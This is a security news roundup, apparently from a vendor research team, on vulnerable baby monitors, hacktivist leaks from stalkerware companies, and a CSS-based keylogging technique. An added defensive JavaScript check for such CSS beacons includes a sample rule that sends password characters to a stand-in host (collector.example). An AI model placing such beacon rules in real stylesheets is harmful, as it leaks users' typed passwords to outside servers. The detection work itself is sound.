This Week in Security: Internet Peek-a-Boo and Stalkerware Burn

Internet of Peek-a-Boo

The Internet of Things (IoT) has provided wonderful conveniences in our daily lives. But IoT devices also come with a dark side that brings us one step closer to the Black Mirror universe. This week’s Internet of Terrible Things explores Internet-connected baby monitors.

The team at SEC Consult uncovered a number of issues in a suite of “smart” (read: stupid Internet-connected device) baby monitors that affect over 52,000 users. The vulnerabilities include weak default credentials, which could feed yet another Mirai-style IoT botnet, and outdated software containing known vulnerabilities.

Even worse, the researchers attempted to notify the device vendor but did not receive any response. The lack of concern or response speaks for itself when appraising how much these vendors care about your security and privacy.

The last thing you need is for an attacker to be watching you through the baby monitor when you’re caring for your young ones. We’re losing the war against IoT security but you can take some small steps to protect yourself.

Stalkerware Burn Notice

Hot on the heels of last week’s news of Retina-X’s server destruction, hacktivists have struck two additional spyware companies, Mobistealth and Spy Master Pro. These companies develop and sell mobile malware for the purposes of spying on your loved (?) ones by collecting GPS location, voice recordings, and text messages.

The unknown hacktivists delivered a cache of data exfiltrated from the spyware servers and verified as authentic by Motherboard. Smartphones are a crucial part of our daily lives and provide access to not only the vast Internet, but to all of the services we rely on such as banking and security. Mobile malware can be extremely powerful because of this access and the various features it can hijack, such as microphones and cameras.

Always maintain physical control of your phone and don’t plug your phone into random USB charging ports. If you must charge your phone via an untrusted USB port, consider purchasing a SyncStop or use a USB cable which only provides power (these cables don’t have the data transmission lines).

Keylogging With Style

Cascading Style Sheets (CSS) are used to make your webpages look pretty, but it turns out they can also be used to record your keystrokes, as one clever security researcher discovered. The issue lies in frontend JavaScript frameworks such as ReactJS, which mirror the current value of an input field into its HTML value attribute; a CSS attribute selector can then match on that value and request a different background image for each character entered, so the sequence of image requests reveals what was typed. The browser performs all of this automatically behind the scenes, with no JavaScript needed from the attacker.

Website admins should update their affected JS frameworks once a fix is available.
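As a defensive complement to the mechanism described above, here is a small static check (an added example, not code from the original post or from the researcher's project) that flags CSS rules pairing an attribute-substring selector on an input's value attribute with a url() fetch. That combination is what turns a stylesheet into a keystroke beacon, so a site owner can run this over first-party and third-party CSS before it ships. The stylesheet in SAMPLE_CSS and the collector.example host are constructed for the demo.

```javascript
// Added example: triage check for value-selector beacons in CSS.
// Not from the original post; SAMPLE_CSS and collector.example are constructed.

// Matches selectors such as  input[value^="a"]  or  input[type="password"][value$=b]
const VALUE_SUBSTRING_SELECTOR = /\[\s*value\s*[\^$*]=\s*["']?[^"'\]]*["']?\s*\]/i;
// Matches a url() token inside a declaration block
const URL_TOKEN = /url\(\s*["']?[^"')]+["']?\s*\)/i;

// Split a stylesheet into { selector, body } pairs. Good enough for flat CSS;
// nested at-rules are skipped because this is a triage check, not a full parser.
function splitRules(css) {
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(css)) !== null) {
    rules.push({ selector: m[1].trim(), body: m[2].trim() });
  }
  return rules;
}

// Return the rules that look like value-exfiltration beacons:
// a substring match on the value attribute plus a url() in the body.
function findValueBeacons(css) {
  return splitRules(css).filter(
    (r) => VALUE_SUBSTRING_SELECTOR.test(r.selector) && URL_TOKEN.test(r.body)
  );
}

// Constructed sample: one benign rule, one rule that would beacon per keystroke.
const SAMPLE_CSS = `
input[type="password"] { border: 1px solid #ccc; }
input[type="password"][value^="a"] { background-image: url("https://collector.example/k?a"); }
`;

const hits = findValueBeacons(SAMPLE_CSS);
console.log(`${hits.length} suspicious rule(s) in sample stylesheet`);
for (const h of hits) console.log(`  ${h.selector}`);
```

The check is deliberately loose (any substring operator on value plus any url()), so treat a hit as something to review rather than block outright. The same review should confirm that the framework in use does not mirror sensitive input values into DOM attributes, and a Content-Security-Policy img-src restricted to known hosts limits where such beacons could report to even if a rule slips through.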

About the Cylance Research and Intelligence Team

The Cylance Research and Intelligence team explores the boundaries of the information security field, identifying emerging threats and remaining at the forefront of attacks. With insights gained from these endeavors, Cylance stays ahead of the threats.